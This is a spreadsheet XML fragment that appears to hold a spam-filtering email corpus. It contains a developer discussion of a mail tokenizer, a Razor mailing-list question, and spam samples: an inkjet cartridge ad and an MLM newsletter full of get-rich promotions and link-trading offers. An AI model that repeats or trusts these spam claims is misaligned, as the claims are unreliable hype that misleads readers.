 Rk9OVD48L0I+PC9DRU5URVI+DQo8L1REPg0KPC9UUj4NCjwvVEFCTEU+PC9D
 RU5URVI+DQoNCjxQIEFMSUdOPSJjZW50ZXIiPiZuYnNwOzwvUD4NCg0KPC9C
 T0RZPg0KPC9IVE1MPg0KMzU3OWJBR1UyLTU2M1RNTW4yMjY5V2dpVzItMzgy
 bUpaSzgzMjJCbDM3
</t>
  </si>
  <si>
    <t xml:space="preserve">[Jeremy Hylton]
 &gt; I think one step towards deployment is creating a re-usable tokenizer
 &gt; for mail messages.  The current codebase doesn't expose an easy-to-use
 &gt; or easy-to-customize tokenizer.
 tokenize() couldn't be easier to use:  it takes a string argument, and
 produces a stream of tokens (whether via explicit list, or generator, or
 tuple, or ... doesn't matter).  All the tokenize() functions in GBayes.py
 and timtest.py are freely interchangeable this way.
 Note that we have no evidence to support that a customizable tokenizer would
 do any good, or, if it would, in which ways customization could be helpful.
 That's a research issue on which no work has been done.
 &gt; The timtest module seems to contain an enormous body of practical
 &gt; knowledge about how to parse mail messages, but the module wasn't
 &gt; designed for re-use.
 That's partly a failure of imagination &lt;wink&gt;.  Splitting out all knowledge
 of tokenization is just a large block cut-and-paste ... there, it's done.
 Change the
     from timtoken import tokenize
 at the top to use any other tokenizer now.  If you want to make it easier
 still, feel free to check in something better.
 &gt; I'd like to see a module that can take a single message or a collection of
 &gt; messages and tokenize each one.
 The Msg and MsgStream classes in timtest.py are a start at that, but it's
 hard to do anything truly *useful* here when people use all sorts of
 different physical representations for email msgs (mboxes in various
 formats, one file per "folder", one file per msg, Skip's gzipped gimmick,
 ...).  If you're a Python coder &lt;wink&gt;, you *should* find it very easy to
 change the guts of Msg and MsgStream to handle your peculiar scheme.
 Defining interfaces for these guys should be done.
 &gt; I'd like to see the tokenize by customizable, too.  Tim had to exclude
 &gt; some headers from his test data, because there were particular biases
 &gt; in the test data.  If other people have test data without those
 &gt; biases, they ought to be able to customize the tokenizer to include
 &gt; them or exclude others.
 This sounds like a bottomless pit to me, and there's no easier way to
 customize than to edit the code.  As README.txt still says, though, massive
 refactoring would help.  Hop to it!
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Printer Cartridges as low as $1.21 each!
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multipart MIME message.
 --= Multipart Boundary 0925021429
 Content-Type: text/plain;
 	charset="ISO-8859-1"
 Content-Transfer-Encoding: 8bit
 &lt;html&gt;
 &lt;head&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;p align="center"&gt;&lt;span style="font-size:7.5pt;font-family:Arial;color:black"&gt;You
 are receiving this email because you opted-in to receive special offers from
 OptinDeals through one of our marketing partners. If you feel you have received
 this email in error or do not wish to receive additional special offers, please
 reply to this email with the word &amp;quot;remove&amp;quot; in the subject line or
 follow the unsubscribe instructions below.&lt;o:p&gt;
 &lt;/o:p&gt;
 &lt;/span&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href="http://www.inkjetrus.com/customer!.html"&gt;&lt;img border="0" 
 src="http://www.inkjetrus.com/clip%20art/toper.jpg" width="800" height="100"&gt;&lt;/a&gt;
 &lt;/p&gt;
 &lt;div align="center"&gt;
   &lt;strong&gt;&lt;font face="Arial" size="6"&gt;Incredible Deals on Inkjet Cartridges!
 &lt;/font&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &lt;strong&gt;&lt;font face="Arial" size="6"&gt;Our Prices Start as low as $1.21&lt;/font&gt;
 &lt;/strong&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &lt;strong&gt;&lt;font face="Arial" size="6"&gt;Check out some of our deals:&lt;/font&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &amp;nbsp;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &lt;a href="http://www.inkjetrus.com/customer!.html"&gt;
   &lt;img border="0" src="http://www.inkjetrus.com/clip%20art/specs.gif" width="439" 
 height="191"&gt;
   &lt;/a&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &amp;nbsp;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &lt;font face="Arial" size="2"&gt;&lt;strong&gt;Check our web site for all the incredible
   deals&lt;/strong&gt;&lt;/font&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &amp;nbsp;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &lt;a href="http://www.inkjetrus.com/customer!.html"&gt;
   &lt;img border="0" src="http://www.inkjetrus.com/clip%20art/clicknow.gif" 
 width="254" height="25"&gt;
   &lt;/a&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &amp;nbsp;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &lt;strong&gt;&lt;font face="Arial"&gt;We have been selling only the best generic printer
   cartridges for over 5 years, and all of our cartridges come with a 6 month
   guarantee!&lt;/font&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &amp;nbsp;
 &lt;/div&gt;
 &lt;p align="center"&gt;&amp;nbsp;For your best price on cartridges shop at &lt;a 
 href="http://www.inkjetrus.com/customer!.html" EUDORA="AUTOURL"&gt;
 http://www.inkjetrus.com/customer!.html&lt;/a&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;span style="font-size:7.5pt;font-family:Verdana;mso-bidi-font-
 family:Tahoma;
 color:black"&gt;HOW TO UNSUBSCRIBE:&lt;br&gt;
 You received this e-mail because you are registered at one of our web sites,&lt;br&gt;
 or at one of our partners' sites or are listed in one of several list
 subscriptions.&lt;br&gt;
 If you do not want to receive e-mail offers, or any email marketing from us&lt;br&gt;
 please &lt;a href="mailto:remove@acsmsupplies.com?subject=please%20remove%20me" 
 target="_blank"&gt;click
 here&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 --= Multipart Boundary 0925021429
 Content-Type: text/html;
 	charset="ISO-8859-1"
 Content-Transfer-Encoding: 8bit
 &lt;html&gt;
 &lt;head&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;p align="center"&gt;&lt;span
 style="font-size:7.5pt;font-family:Arial;color:black"&gt;You
 are receiving this email because you opted-in to receive special offers from
 OptinDeals through one of our marketing partners. If you feel you have
 received
 this email in error or do not wish to receive additional special offers,
 please
 reply to this email with the word &amp;quot;remove&amp;quot; in the subject line or
 follow the unsubscribe instructions below.&lt;o:p&gt;
 &lt;/o:p&gt;
 &lt;/span&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href="http://www.inkjetrus.com/customer!.html"&gt;&lt;img border="0" 
 src="http://www.inkjetrus.com/clip%20art/toper.jpg" width="800"
 height="100"&gt;&lt;/a&gt;
 &lt;/p&gt;
 &lt;div align="center"&gt;
   &lt;strong&gt;&lt;font face="Arial" size="6"&gt;Incredible Deals on Inkjet Cartridges!
 &lt;/font&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &lt;strong&gt;&lt;font face="Arial" size="6"&gt;Our Prices Start as low as
 $1.21&lt;/font&gt;
 &lt;/strong&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &lt;strong&gt;&lt;font face="Arial" size="6"&gt;Check out some of our
 deals:&lt;/font&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &amp;nbsp;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &lt;a href="http://www.inkjetrus.com/customer!.html"&gt;
   &lt;img border="0" src="http://www.inkjetrus.com/clip%20art/specs.gif"
 width="439" 
 height="191"&gt;
   &lt;/a&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &amp;nbsp;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &lt;font face="Arial" size="2"&gt;&lt;strong&gt;Check our web site for all the
 incredible
   deals&lt;/strong&gt;&lt;/font&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &amp;nbsp;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &lt;a href="http://www.inkjetrus.com/customer!.html"&gt;
   &lt;img border="0" src="http://www.inkjetrus.com/clip%20art/clicknow.gif" 
 width="254" height="25"&gt;
   &lt;/a&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &amp;nbsp;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &lt;strong&gt;&lt;font face="Arial"&gt;We have been selling only the best generic
 printer
   cartridges for over 5 years, and all of our cartridges come with a 6 month
   guarantee!&lt;/font&gt;&lt;/strong&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;
   &amp;nbsp;
 &lt;/div&gt;
 &lt;p align="center"&gt;&amp;nbsp;For your best price on cartridges shop at &lt;a 
 href="http://www.inkjetrus.com/customer!.html" EUDORA="AUTOURL"&gt;
 http://www.inkjetrus.com/customer!.html&lt;/a&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;span
 style="font-size:7.5pt;font-family:Verdana;mso-bidi-font-
 family:Tahoma;
 color:black"&gt;HOW TO UNSUBSCRIBE:&lt;br&gt;
 You received this e-mail because you are registered at one of our web
 sites,&lt;br&gt;
 or at one of our partners' sites or are listed in one of several list
 subscriptions.&lt;br&gt;
 If you do not want to receive e-mail offers, or any email marketing from
 us&lt;br&gt;
 please &lt;a
 href="mailto:remove@acsmsupplies.com?subject=please%20remove%20me" 
 target="_blank"&gt;click
 here&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 --= Multipart Boundary 0925021429--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Smrazor, Milter, and Max connections
</t>
  </si>
  <si>
    <t xml:space="preserve">With v2.14 of razor client and using Solaris 9 with sendmail 8.12.5 I have
 managed to get smrazor working (milter) -- sort of ... With light server
 loads, it seems to do fine; however during peak traffic times (or peak
 catalogue server usage???) , the smrazor milter stops and sometime dumps
 core as well.  Does anyone know of a limit in terms of number of
 messages/minute that can be theoretically processed? I have noticed timeouts
 occuring (I set the milter timeout per message to 15 seconds) often in huge
 lumps and the occasional "Could not get valid info from Discovery Servers")
 ?????
 I am not using procmail because this [cluster of] server is a gateway on to
 5 different pop3 servers (5 different domains), ergo, local users won't work
 because of overlapping usernames ...(or insanely huge virtusertable to alias
 mappings .....)
 Alternatively does anyone have a working, high-capacity milter for this or
 any other related ideas???
 Sven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</si>
  <si>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Your Membership Community &amp; Commentary, 08-03-01
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --1465727098.996838841831.JavaMail.RovAdmin.rovweb003
 Content-Type: text/plain; charset=iso-8859-1
 Your Membership Community &amp; Commentary (August 3, 2001)
 It's All About Making Money
 Information to provide you with the absolute 
 best low and no cost ways of providing traffic 
 to your site, helping you to capitalize on the power 
 and potential the web brings to every Net-Preneur. 
 --- This Issue Contains Sites Who Will Trade Links With You! --- 
 -------------
 IN THIS ISSUE
 -------------
 Top Ten Most Important Things to Do Today
 Member Showcase
 Commentary Quick Tips
 Win A FREE Ad In Community &amp; Commentary
 ||| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&gt;&gt;
     Today's Special Announcement:
 ||| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&gt;&gt;
 Right now, this week only - We have left over inventory, it's 
 unsold, but not for long.  If you could use 1 million banner 
 ads all targeted and dirt cheap go here today. This package 
 is guaranteed!! It's tough to fail when you can show your ad 
 to 1,000 people for less than a buck! A free custom banner 
 will be made for you with this deal! 
 http://BannersGoMLM.com/promo/million-nl.html 
 ||| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&gt;&gt;
 You are a member in at least one of these programs 
 - You should be in them all! 
 http://www.BannersGoMLM.com 
 http://www.ProfitBanners.com 
 http://www.CashPromotions.com 
 http://www.MySiteInc.com 
 http://www.TimsHomeTownStories.com 
 http://www.FreeLinksNetwork.com 
 http://www.MyShoppingPlace.com 
 http://www.BannerCo-op.com 
 http://www.PutPEEL.com 
 http://www.PutPEEL.net 
 http://www.SELLinternetACCESS.com 
 http://www.Be-Your-Own-ISP.com 
 http://www.SeventhPower.com 
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Top Ten Most Important Things to Do Today
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Top Ten Most Important Things to Do Today
 By Michael E. Angier
 This is my list. They're the ones I've selected for my life at
 present. Consider them suggestions for yourself--ideas to 
 help you generate your own top ten list. By getting clear 
 on and acting upon YOUR most important steps, you'll be 
 moving toward and experiencing your highest and best.
 1. Practice gratefulness. Reflect upon the things in my life for
 which I'm grateful. If I appreciate more of what I have, I will
 have even more to appreciate.
 2. Write out my three most important goals and visualize 
 how my life will be when I have achieved them. FEEL it. 
 EXPERIENCE it in as much sensory detail as I can possibly 
 imagine.
 3. Take some action steps toward each of the three goals.
 4. Exercise my body and monitor carefully what I eat and 
 drink. Reduce fat and caloric intake while expending more 
 calories. Eat only small amounts at one time.
 5. Read something educational, inspirational or
 entertaining--preferably all three.
 6. Meditate. Empty my conscious mind and listen to the
 Super-conscious.
 7. Have fun doing something I love to do. Experience joy.
 8. Write something--anything. If not an article or part of 
 my book, then write in my journal.
 9. Perform some act of kindness. Do a thoughtful, 
 magnanimous thing--anonymously if possible.
 10. Finish something. Do something I can call complete.
 Bonus Step: Make something work better -- 
 Practice ADS: Automate, Delegate and Systemize.
 Copyright 2001 Michael Angier &amp; Success Networks International.
 -------------------------------------
 About the Author...
 Michael Angier is the founder and president of Success Networks.
 Success Net's mission is to inform, inspire and empower people
 to be their best--personally and professionally. Download their
 free eBooklet, KEYS TO PERSONAL EFFECTIVENESS from
 http://www.SuccessNet.org/keys.htm. Free subscriptions,
 memberships, books and SuccessMark Cards are available at
 http://www.SuccessNet.org 
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Member Showcase
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Examine carefully - Those with email addresses included WILL 
 TRADE LINKS with you... You are encouraged to contact them. 
 There Are Many Ways To Build A Successful Business - Just look 
 at these successful sites &amp; programs other members are involved 
 in...
 -------------------------------------------------
 ******** FREE CD-Rom Software ********* 
 Over 1000 high quality software titles on CD-ROM 
 absolutely FREE! YES, the software is free, (s/h) 
 Click Here: http://www.adreporting.com/at.cgi?a=156074&amp;e=/2/ 
 ---------------------------------------------------------------------
 Stop Smoking - Free Lesson !! 
 Discover the Secret to Stopping Smoking. 
 To Master these Powerful Techniques, Come to 
 http://www.breath-of-life.net for your Free Lesson. 
 Act Now!  P.S. Tell someone you care about. 
 Trade Links - jturco3@hotmail.com 
 ---------------------------------------------------------------------
 For a limited time only, we are offering --TWO-- FREE eBooks 
 to show you how to MAKE MONEY ON THE INTERNET! 
 Use our PROVEN, DUPLICATABLE methods to get in on 
 this EXPLODING opportunity now!  Visit us at: 
 http://www.Abundance-Group.com to collect your FREE offers! 
 Trade Links - Gina@AbundanceGroup.com 
 ---------------------------------------------------------------------
 Life Without Debt! What would you do with 5,000 10,000 
 20,000 100,000? A "Dream Team" of heavy hitters are 
 gathering to promote Life Without Debt. Get in NOW to 
 receive Massive spillover in the 2x matrix. 
 http://trafficentral.com/lwd/index.htm 
 -------------------------------------------------------------- 
   If you have a product, service, opportunity or quality 
   merchandise that appeals to people worldwide, reach your 
   targeted audience! For a fraction of what other large 
   newsletters charge you can exhibit your website here, and 
   trade links for only $8 CPM. Compare that to the 
   industry average of $10-$15 CPM. Why?... Because as a 
   valuable member we want you to be successful! Order today - 
   Showcases are limited and published on a first come, first 
   serve basis. For our secure order form, click here: 
   http://bannersgomlm.com/ezine 
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Commentary Quick Tips
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Website Recommendation:
 Here is a site with some useful tips. 
 Example - test your Internet connection speed.  
 http://www.camscape.com/tips/
 I doubled my DSL speed with just one minor tweak 
 suggested by one of the links given.
 Submitted by F. Knopke
 imco@telusplanet.net
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Do you have a marketing hint, product recommendation, or
 online gem of wisdom you'd like to share with your fellow
 subscribers? With your 2 - 10 line Quick Tip include your
 name and URL or email address and  we'll give you credit
 for your words of wisdom.
 And, if you're looking for free advertising, this isn't
 the place - check out the 'One Question Survey' below for
 a great free advertising offer.
 Send it in to mailto:Submit@AEOpublishing.com
 with 'Quick Tip' in the Subject block.
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Win A FREE Ad In Community &amp; Commentary
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 To keep this interesting, how about this, every month we'll 
 draw a name from the replies and that person will win one 
 Sponsorship Showcase in the Community &amp; Commentary, for FREE. 
 That's a value of over $800.00! Respond to each weekly survey, 
 and increase your chances to win with four separate entries. 
  QUESTION OF THE WEEK (08/03/01)...
  No right or wrong answers, and just by answering
  you are entered to win a Sponsorship Showcase  - Free!
  ~~~ How many email messages do you get per day? ~~~
 Less than 40            mailto:one@AEOpublishing.com
 41-100                        mailto:two@AEOpublishing.com
 101-300                    mailto:three@AEOpublishing.com
 301-1000                    mailto:four@AEOpublishing.com
 More than 1000        mailto:five@AEOpublishing.com
 To make this as easy as possible for you, just click on the
 hyperlinked answer to send us an e-mail  - you do not need to
 enter any information in the subject or body of the message.
 ** ADD YOUR COMMENTS!  Follow directions above and
 add your comments in the body of the message, and we'll
 post the best commentaries along with the responses.
 You will automatically be entered in our drawing for a free
 Sponsorship ad in the Community &amp; Commentary. Please
 respond only one time per question.  Multiple responses
 from the same individual will be discarded.
 Last Weeks's Survey Results &amp; Comments  (07/27/01)
  ~~~ Are you concerned about identity theft online? ~~~
 yes   81%
 no    19%
 Comments:
 ~~~~~~~~~
 No. This is a funny thing to me.  I hear about so many 
 people being super scared to give out their SS#.  Well folks, 
 I can get your SS# for 50 cents.  Give me a name and address 
 and about 90% of the time I can get the number.  
 We are so worried about putting our credit card number on
 the net, but we will give the card to a waiter or waitress and 
 they take it out of our sight for 10 minutes.  They could do 
 who knows what with the CC number.  I once had a person 
 tell me that her lawyer said that she should never fax a copy 
 of her check to anyone (checks by fax) because then that 
 person (me) would have her account info and could write 
 a check out for thousands of dollars.  I told her to just send 
 it to me then and she said that was OK.  Then I asked her 
 to tell me what the difference was between the original check 
 and a fax copy.  I told her to ask her lawyer that too.  Never 
 heard back from her.  
 The bottom line is that if a crook wants to get your info, it is 
 available in many places.  Have a good day.
 --  Terry    http://mysiteinc.com/tfn/lfi.html
 ~~~~~~~~~
 Yes. I believe that the risk is out there but minimal. However, 
 we can cut those risks by a few simple precautions. Most 
 importantly, never give any personal information at a site 
 that is not secure, always look for the lock in thetask bar 
 or a Veri secure sign or others. 
 Also, never leave your information stored at a site. I put 
 in my credit information in each time instead of having 
 an account in standing, a little more time but less risks 
 involved! Of course, I mostly shop at my own Internet 
 mall and I know how safe it is there, credit card info is 
 deleted in a matter of seconds. Overall, I believe the web 
 to be a safe and very fruitful new frontier!
 --  Catherine F.      http://www.catco.nexgenmall.com 
 ~~~~~~~~~
 Yes. I had phenomena for 6 weeks and did not realize that 
 my ISP was shut down at the same time because the owner 
 was in a bad car accident.  I had a full service account.  
 My Internic fees were not paid so my WEB Address 
 went unprotected.  A Russian stepped in; paid the fees; 
 and, promptly assigned my www.SchoolOfGeomatics.com 
 address to a porn shop.  Thus, I lost 4 years of building 
 up 1st place rankings on 12 Search Engines and 2nd place 
 on 8 more.  This set me back about 4  months: I believe I 
 lost a minimum of $50,000.  
 I have also been hit with viruses about 10 times.  The first 
 time I lost almost 4 months of work.  Now, I back up often 
 enough to not to lose so much time.  This is also Internet 
 theft.  These people are nothing but out and out criminals 
 and should spend years behind bars.
 Customers are well protected from credit card theft; 
 however, merchants can lose a lot of money.  I sell only by 
 purchase order and certified or registered company checks.
 --  Peter S.    http://www.GSSGeomatics.com
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~
                JULY WINNER ANNOUNCED!
 And the July 'One-Question Survey' WINNER is...
            John Stitzel   -   oldstitz@yahoo.com
                    Congratulations John!
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 To change your subscribed address, send both new and old 
 address to mailto:Submit@AEOpublishing.com 
 See the link (below) for our Subscription Center to unsubscribe 
 or edit your interests. 
 Please send suggestions and comments to: 
 mailto:Editor@AEOpublishing.com 
 I invite you to send your real successes and showcase 
 your strategies and techniques, or yes, even your total bombs, 
 "Working Together We Can All Prosper." 
 mailto:Submit@AEOpublishing.com 
 For information on how to sponsor Your Membership 
 Community &amp; Commentary visit: http://bannersgomlm.com/ezine 
 Copyright 2001 AEOpublishing.com 
 ------------------------------------------------
 web: http://www.AEOpublishing.com
 ------------------------------------------------
 This email has been sent to jm@netnoteinc.com at your 
 request, by Your Membership Newsletter Services.
 Visit our Subscription Center to edit your interests or unsubscribe.
 http://ccprod.roving.com/roving/d.jsp?p=oo&amp;id=bd7n7877.8lhtdma6&amp;m=bd7n7877&amp;ea=jm@netnoteinc.com
 View our privacy policy: http://ccprod.roving.com/roving/CCPrivacyPolicy.jsp
 Powered by 
 Constant Contact(R)
 www.constantcontact.com
 --1465727098.996838841831.JavaMail.RovAdmin.rovweb003
 Content-Type: text/html; charset=iso-8859-1
 &lt;HTML&gt;
 &lt;!-- 
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;HTML-FORMATTED MESSAGE BELOW
 The remainder of this message is in HTML format for use by email
 clients that can properly display it.   If you are seeing this message,
 it is because your email client cannot properly display HTML.  You can
 ignore the HTML code you will see below.
  --&gt;
 &lt;head&gt;
 	&lt;title&gt;Your Membership Community &amp; Commentary, 08-03-01&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#ffffff" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"&gt;
 &lt;IMG SRC="http://ccprod.roving.com/roving/sa/o.jsp?id=bd7n7877.8lhtdma6&amp;o=http://ccprod.roving.com/roving/images/p1x1.gif" WIDTH=1 HEIGHT=1 alt=" "&gt;
 &lt;!--  Do NOT delete previous line if you want to get statistics on the number of opened emails  --&gt;
 &lt;center&gt;
 &lt;table border="1" bordercolor="#003366" cellpadding="0" cellspacing="0" width="610"&gt;
 &lt;tr&gt;
 	&lt;td&gt;
 &lt;table border="0" cellpadding="0" cellspacing="0" width="100%"&gt;
 &lt;!-- Begin Logo Include --&gt;
 &lt;!-- START CONDITIONAL HTML HIDING 
 &lt;tr&gt;
 	&lt;td colspan="2" align="center"&gt;&lt;img src="" border="0" alt="Your Membership Newsletter Services"&gt;&lt;/td&gt;
 &lt;/tr&gt;
  END OF CONDITIONAL HTML HIDING --&gt; 
 &lt;!-- End Logo Include --&gt;
 &lt;tr&gt;
 	&lt;td colspan="2" align="center" valign="middle" bgcolor="#668ABE" height="60"&gt;&lt;font face="Georgia,'Times New Roman',Times,serif" size="6" color="#ffffff"&gt;Your Membership Community &amp; Commentary&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 	&lt;td align="left"&gt;&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;b&gt;It's All About Making Money&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 	&lt;td align="right"&gt;&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;b&gt;August 3, 2001&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;
 &lt;table border="0" cellpadding="0" cellspacing="0" width="100%"&gt;
 &lt;tr&gt;
 	&lt;td width="190" bgcolor="#EEEEDF" align="center" valign="top"&gt;
 	&lt;!-- Begin Table of Contents Header Table --&gt;
 		&lt;table border="1" bordercolor="#003366" cellpadding="2" cellspacing="0" width="190"&gt;
 		&lt;tr&gt;
 			&lt;td bgcolor="#ffffff" align="center" valign="top"&gt;
 			&lt;font face="Georgia,'Times New Roman',Times,serif" size="3" color="#003366"&gt;
 			&lt;b&gt;in this issue&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;!-- End Table of Contents Header Table --&gt;
 	&lt;!-- Begin Article Headlines Table --&gt;
 		&lt;table border="0" cellpadding="2" cellspacing="0" width="190"&gt;
 		&lt;tr&gt;
 			&lt;td bgcolor="#DBE8F4" align="center" valign="top"&gt;
 			&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;b&gt;
 			&lt;br&gt;&lt;a href="#article1"&gt;Top Ten Most Important Things to Do Today&lt;/a&gt;
 			&lt;p&gt;&lt;a href="#article2"&gt;Member Showcase&lt;/a&gt;
 			&lt;p&gt;&lt;a href="#article3"&gt;Commentary Quick Tips&lt;/a&gt;
 			&lt;p&gt;&lt;a href="#article4"&gt;Win A FREE Ad In Community &amp; Commentary&lt;/a&gt;
 			&lt;p&gt;&lt;a href="#article5"&gt;&lt;/a&gt;
 		    &lt;br&gt;&lt;br&gt;&lt;/font&gt;
 		    &lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td bgcolor="#003366" align="center" valign="top"&gt;&lt;br&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
     &lt;!-- End Article Headlines Table --&gt;
     &lt;!-- PROMOTION START --&gt;
 		&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;
 		&lt;br&gt;&lt;b&gt;Today's Special Announcement:&lt;/b&gt;&lt;br&gt;
 		&lt;!-- Promotion Image --&gt;
 		&lt;br&gt;
 		&lt;p&gt;Right now, this week only - We have left over inventory, it's
 &lt;br&gt;unsold, but not for long.&amp;nbsp; If you could use 1 million banner
 &lt;br&gt;ads all targeted and dirt cheap go here today. This package
 &lt;br&gt;is guaranteed!! It's tough to fail when you can show your ad
 &lt;br&gt;to 1,000 people for less than a buck! A free custom banner
 &lt;br&gt;will be made for you with this deal!
 &lt;br&gt;&lt;a href="http://BannersGoMLM.com/promo/million-nl.html"&gt;Click Here!&lt;/a&gt;
 &lt;br&gt;&amp;nbsp;&lt;p&gt;
 &lt;br&gt;&amp;nbsp;&lt;p&gt;
 You are a member in at least one of these programs 
 - You should be in them all! &lt;br&gt;
 &lt;a href="http://www.BannersGoMLM.com"&gt; BannersGoMLM.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.ProfitBanners.com"&gt; ProfitBanners.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.CashPromotions.com"&gt; CashPromotions.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.MySiteInc.com"&gt; MySiteInc.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.TimsHomeTownStories.com"&gt; TimsHomeTownStories.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.FreeLinksNetwork.com"&gt; FreeLinksNetwork.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.MyShoppingPlace.com"&gt; MyShoppingPlace.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.BannerCo-op.com"&gt; BannerCo-op.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.PutPEEL.com"&gt; PutPEEL.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.PutPEEL.net"&gt; PutPEEL.net &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.SELLinternetACCESS.com"&gt; SELLinternetACCESS.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.Be-Your-Own-ISP.com"&gt; Be-Your-Own-ISP.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.SeventhPower.com"&gt; SeventhPower.com &lt;/a&gt;&lt;p&gt;
         &lt;br&gt;&lt;br&gt;
 		&lt;/font&gt;
     &lt;!-- PROMOTION END --&gt;
 	&lt;/td&gt;
 	&lt;td rowspan="2" width="420" valign="top"&gt;
 	&lt;!-- Begin Greeting and Intro paragraph --&gt;
 		&lt;table border="0" cellpadding="2" cellspacing="0" width="100%"&gt;
 		&lt;tr&gt;
 			&lt;td bgcolor="#ffffff" valign="top"&gt;&lt;/td&gt;
 			&lt;td bgcolor="#ffffff" valign="top"&gt;
             &lt;font size="2" face="Verdana,Arial,Helvetica"&gt;
             &lt;b&gt;&lt;/b&gt;
 			&lt;br&gt;Information to provide you with the absolute 
 &lt;br&gt;best low and no cost ways of providing traffic 
 &lt;br&gt;to your site, helping you to capitalize on the power &lt;br&gt;and potential the web brings to every Net-Preneur. &lt;br&gt;
 --- This Issue Contains Sites Who Will Trade Links With You! --- &lt;br&gt;
 			&lt;br&gt;&lt;br&gt;&lt;/font&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td bgcolor="#003366" colspan="2" height="3" valign="bottom"&gt; &lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td bgcolor="#ffffff" colspan="2" height="2" valign="bottom"&gt; &lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td bgcolor="#003366" colspan="2" height="2" valign="bottom"&gt; &lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;!-- End Greeting and Intro paragraph --&gt;
 	&lt;!-- Begin Article Table --&gt;
